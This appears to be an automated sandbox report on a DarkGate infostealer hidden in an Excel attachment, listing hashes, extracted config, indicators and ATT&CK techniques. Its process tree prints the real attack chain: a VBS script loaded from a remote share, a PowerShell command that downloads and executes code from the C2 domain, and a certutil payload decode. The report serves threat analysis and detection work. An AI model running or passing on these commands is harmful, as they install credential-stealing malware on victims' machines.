darkgate | 4ae1c188272b686bf076356fc9bf3a1964201c5848609991412be5e02a99fdc9

Analysis

max time kernel
165s
max time network
141s
platform
windows10-1703_x64
resource
win10-20240221-en
resource tags

arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
submitted
15/03/2024, 16:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ACH-8503-15March.xlsx
Size

48KB
MD5

f26561f2e03be889c91d12fdd4c2efaf
SHA1

bc37513e228202b086bfa4a956c919eaf76b7223
SHA256

4ae1c188272b686bf076356fc9bf3a1964201c5848609991412be5e02a99fdc9
SHA512

5cc1c38a4ff5374aca259d6fb40aeac39ac4fe588d62a92c23eaa92e6c89d94830c95fbff145dbc6108e1e55b41cb38024beba8f0eb4d48360641ea4c8be46db
SSDEEP

768:ZFlppbq6i4Y/TJC4xJMxXcvFLwAPq4Sxv9PvEgzegYN1T/N:tLq94YV7JMxXyd4x+gzexTl

Score

10^/10

darkgate admin888 stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

diveupdown.com

Attributes

anti_analysis
true
anti_debug
false
anti_vm
true
c2_port
80
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_raw_stub
false
internal_mutex
VfiPBBhr
minimum_disk
50
minimum_ram
4000
ping_interval
6
rootkit
false
startup_persistence
true
username
admin888

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Detect DarkGate stealer 4 IoCs

resource	yara_rule
behavioral1/memory/4652-301-0x00000000049D0000-0x0000000004A43000-memory.dmp	family_darkgate_v6
behavioral1/memory/4652-303-0x00000000049D0000-0x0000000004A43000-memory.dmp	family_darkgate_v6
behavioral1/memory/3272-339-0x0000000004600000-0x0000000004673000-memory.dmp	family_darkgate_v6
behavioral1/memory/3272-341-0x0000000004600000-0x0000000004673000-memory.dmp	family_darkgate_v6

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	356	3664	WScript.exe	74
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1412	3664	WScript.exe	74

Blocklisted process makes network request 8 IoCs

flow	pid	Process
24	876	powershell.exe
25	876	powershell.exe
28	876	powershell.exe
29	876	powershell.exe
30	1404	powershell.exe
31	1404	powershell.exe
39	1404	powershell.exe
40	1404	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
4652	AutoHotkey.exe
3272	AutoHotkey.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3664	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
876	powershell.exe
876	powershell.exe
876	powershell.exe
1404	powershell.exe
1404	powershell.exe
1404	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	876	powershell.exe
Token: SeDebugPrivilege	1404	powershell.exe

Suspicious use of SetWindowsHookEx 17 IoCs

pid	Process
3664	EXCEL.EXE
3664	EXCEL.EXE
3664	EXCEL.EXE
3664	EXCEL.EXE
3664	EXCEL.EXE
3664	EXCEL.EXE
3664	EXCEL.EXE
3664	EXCEL.EXE
3664	EXCEL.EXE
3664	EXCEL.EXE
3664	EXCEL.EXE
3664	EXCEL.EXE
3664	EXCEL.EXE
3664	EXCEL.EXE
3664	EXCEL.EXE
3664	EXCEL.EXE
3664	EXCEL.EXE

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 3664 wrote to memory of 356	3664	EXCEL.EXE	77
PID 3664 wrote to memory of 356	3664	EXCEL.EXE	77
PID 356 wrote to memory of 876	356	WScript.exe	78
PID 356 wrote to memory of 876	356	WScript.exe	78
PID 876 wrote to memory of 4088	876	powershell.exe	82
PID 876 wrote to memory of 4088	876	powershell.exe	82
PID 3664 wrote to memory of 1412	3664	EXCEL.EXE	83
PID 3664 wrote to memory of 1412	3664	EXCEL.EXE	83
PID 1412 wrote to memory of 1404	1412	WScript.exe	84
PID 1412 wrote to memory of 1404	1412	WScript.exe	84
PID 876 wrote to memory of 4652	876	powershell.exe	86
PID 876 wrote to memory of 4652	876	powershell.exe	86
PID 876 wrote to memory of 4652	876	powershell.exe	86
PID 876 wrote to memory of 828	876	powershell.exe	87
PID 876 wrote to memory of 828	876	powershell.exe	87
PID 1404 wrote to memory of 2616	1404	powershell.exe	89
PID 1404 wrote to memory of 2616	1404	powershell.exe	89
PID 1404 wrote to memory of 3272	1404	powershell.exe	91
PID 1404 wrote to memory of 3272	1404	powershell.exe	91
PID 1404 wrote to memory of 3272	1404	powershell.exe	91
PID 1404 wrote to memory of 4496	1404	powershell.exe	92
PID 1404 wrote to memory of 4496	1404	powershell.exe	92

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4496	attrib.exe
828	attrib.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ACH-8503-15March.xlsx"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3664
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\147.182.156.154\share\EXCEL_DOCUMENT_OPEN.XLSX.vbs"
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'diveupdown.com/uyvbjbho')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:876
  - - C:\Windows\system32\certutil.exe
      "C:\Windows\system32\certutil.exe" -decodehex a.bin AutoHotkey.exe
      4⤵
      PID:4088
  - - C:\fpcg\AutoHotkey.exe
      "C:\fpcg\AutoHotkey.exe" script.ahk
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      PID:4652
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h C:/fpcg
      4⤵
      Views/modifies file attributes
      PID:828
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\147.182.156.154\share\EXCEL_DOCUMENT_OPEN.XLSX.vbs"
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:1412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'diveupdown.com/uyvbjbho')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1404
  - - C:\Windows\system32\certutil.exe
      "C:\Windows\system32\certutil.exe" -decodehex a.bin AutoHotkey.exe
      4⤵
      PID:2616
  - - C:\fpcg\AutoHotkey.exe
      "C:\fpcg\AutoHotkey.exe" script.ahk
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      PID:3272
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h C:/fpcg
      4⤵
      Views/modifies file attributes
      PID:4496

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4720

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f249246e14b54dbdabfe884e240147f1

SHA1
67ab751f7f9c2be51b55d61cd2f70cdff1c4a1fa

SHA256
eedb16dc0348b1b341fbf579d25594a1b3ab7d7d20763af44441720690842555

SHA512
a4a20ac7b3653f99c65b23949b14454eaf6c5b34037973b1fb989242842b6183c191ebb52311a4cf7699874e55b913bb96d30db8c4263b8a484c2c1d29832a15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6a8eea1ec9468a45ceeeb9d93b2a6089

SHA1
4e82a3722d737bf0ef94dfbcb305302fef20dd4e

SHA256
e9a7cece2fc289e7f8ce38e64dc131d6fe8f44c26bab6d4387cb695f203ebb63

SHA512
3ef08a4a233aacaf1176bede7b8abe9f33b8a047610bc8c442dfb651e95c58db54ee2b966a8a261dee3e37b79b1fef1b6b7b333c03783b99837eed8aa7b8e702

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ycdxfyqr.leo.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\hCdABAA

Filesize
32B

MD5
9e40c8a9c2b7cb35498f28a481f96535

SHA1
decfa2cec4a54ae78cd2e3e9a2c95b838e89dfa4

SHA256
96cd420385ed0f2fe97b7033237fbbbc2181d3761a8cbe72e9a6fc299bbdda11

SHA512
af1300c9e38b3b9b26510f94d4364b0b0bd8b64b91cf620e2fa15573852320ba915f58cf782b4bf47473d50e58714017d2ae48090d37c3347971accaaa41bbb9

Download Submit
C:\fpcg\AutoHotkey.exe

Filesize
892KB

MD5
a59a2d3e5dda7aca6ec879263aa42fd3

SHA1
312d496ec90eb30d5319307d47bfef602b6b8c6c

SHA256
897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb

SHA512
852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030

Download Submit
C:\fpcg\a.bin

Filesize
1.7MB

MD5
bf88d228baec74c7928df463db0f0fdc

SHA1
efe1657bb9a9a31742b71d8c14bae89b2ab5533b

SHA256
493099b55ea0da872d3b9855c5a60752833e737be547ebc5328caea2bf0542ed

SHA512
c247a0dbba9971a8949729f888a4d8b10ca188b6fabedb9d1fe9cc7907cc4d807e66f3367ca287bf1e4062c342cbb7a724a9cc168018f55bc187e04897c8bdfa

Download Submit
C:\fpcg\script.ahk

Filesize
52KB

MD5
3433308fb4cfbf4754f37f8429cca3f6

SHA1
a98c60ac207b30e015fa970059cd3d6af5aad11f

SHA256
bf1bdcce4d86d8fce80f359f1a871c1bc70e29b3fcdff1d2ac70570ecf5a1bdc

SHA512
0cc02989002194d4e86dd2452b552360a4472d72e261921cf2b13ab50523d789732b5b677c664ae73c5751180665417b349c3c424c41fb0d27026bc7f8f9b3cf

Download Submit
C:\fpcg\test.txt

Filesize
916KB

MD5
a7c06b0255856bae512a0f174891d74f

SHA1
801b8ea8a27641fcfee78af6eff906052149054c

SHA256
3816103d61866097c2f216a4668b633ce126ad18da77b3b6c87ac24382f70929

SHA512
5d586cb80b3116d002c81b4df7aa449cd6fae454d03812eee3dd72de4e0806035d01bc4fcf16130f35ebfe5707c2d11e9453f8eb66f778a7729dc94bbfbd4cd6

Download Submit
memory/876-188-0x000001CC632F0000-0x000001CC63312000-memory.dmp

Filesize
136KB

Download
memory/876-230-0x000001CC63080000-0x000001CC63090000-memory.dmp

Filesize
64KB

Download
memory/876-229-0x000001CC63080000-0x000001CC63090000-memory.dmp

Filesize
64KB

Download
memory/876-228-0x000001CC63080000-0x000001CC63090000-memory.dmp

Filesize
64KB

Download
memory/876-227-0x00007FFB1F770000-0x00007FFB2015C000-memory.dmp

Filesize
9.9MB

Download
memory/876-217-0x000001CC63C10000-0x000001CC63DD2000-memory.dmp

Filesize
1.8MB

Download
memory/876-209-0x000001CC63080000-0x000001CC63090000-memory.dmp

Filesize
64KB

Download
memory/876-299-0x00007FFB1F770000-0x00007FFB2015C000-memory.dmp

Filesize
9.9MB

Download
memory/876-194-0x000001CC634A0000-0x000001CC63516000-memory.dmp

Filesize
472KB

Download
memory/876-190-0x000001CC63080000-0x000001CC63090000-memory.dmp

Filesize
64KB

Download
memory/876-191-0x000001CC63080000-0x000001CC63090000-memory.dmp

Filesize
64KB

Download
memory/876-189-0x00007FFB1F770000-0x00007FFB2015C000-memory.dmp

Filesize
9.9MB

Download
memory/1404-249-0x000001D865170000-0x000001D865180000-memory.dmp

Filesize
64KB

Download
memory/1404-247-0x00007FFB1F770000-0x00007FFB2015C000-memory.dmp

Filesize
9.9MB

Download
memory/1404-337-0x00007FFB1F770000-0x00007FFB2015C000-memory.dmp

Filesize
9.9MB

Download
memory/1404-310-0x000001D865170000-0x000001D865180000-memory.dmp

Filesize
64KB

Download
memory/1404-309-0x000001D865170000-0x000001D865180000-memory.dmp

Filesize
64KB

Download
memory/1404-308-0x000001D865170000-0x000001D865180000-memory.dmp

Filesize
64KB

Download
memory/1404-307-0x00007FFB1F770000-0x00007FFB2015C000-memory.dmp

Filesize
9.9MB

Download
memory/1404-268-0x000001D865170000-0x000001D865180000-memory.dmp

Filesize
64KB

Download
memory/1404-250-0x000001D865170000-0x000001D865180000-memory.dmp

Filesize
64KB

Download
memory/3272-341-0x0000000004600000-0x0000000004673000-memory.dmp

Filesize
460KB

Download
memory/3272-339-0x0000000004600000-0x0000000004673000-memory.dmp

Filesize
460KB

Download
memory/3664-6-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-180-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-21-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-18-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-20-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-19-0x00007FFB023A0000-0x00007FFB023B0000-memory.dmp

Filesize
64KB

Download
memory/3664-17-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-16-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-15-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-14-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-13-0x00007FFB023A0000-0x00007FFB023B0000-memory.dmp

Filesize
64KB

Download
memory/3664-12-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-23-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-11-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-183-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-181-0x00007FFB43C10000-0x00007FFB43CBE000-memory.dmp

Filesize
696KB

Download
memory/3664-1-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-22-0x00007FFB43C10000-0x00007FFB43CBE000-memory.dmp

Filesize
696KB

Download
memory/3664-10-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-8-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-5-0x00007FFB05F10000-0x00007FFB05F20000-memory.dmp

Filesize
64KB

Download
memory/3664-4-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-24-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-25-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-179-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-29-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-28-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-27-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-3-0x00007FFB05F10000-0x00007FFB05F20000-memory.dmp

Filesize
64KB

Download
memory/3664-2-0x00007FFB05F10000-0x00007FFB05F20000-memory.dmp

Filesize
64KB

Download
memory/3664-26-0x00007FFB45E80000-0x00007FFB4605B000-memory.dmp

Filesize
1.9MB

Download
memory/3664-0-0x00007FFB05F10000-0x00007FFB05F20000-memory.dmp

Filesize
64KB

Download
memory/4652-303-0x00000000049D0000-0x0000000004A43000-memory.dmp

Filesize
460KB

Download
memory/4652-301-0x00000000049D0000-0x0000000004A43000-memory.dmp

Filesize
460KB

Download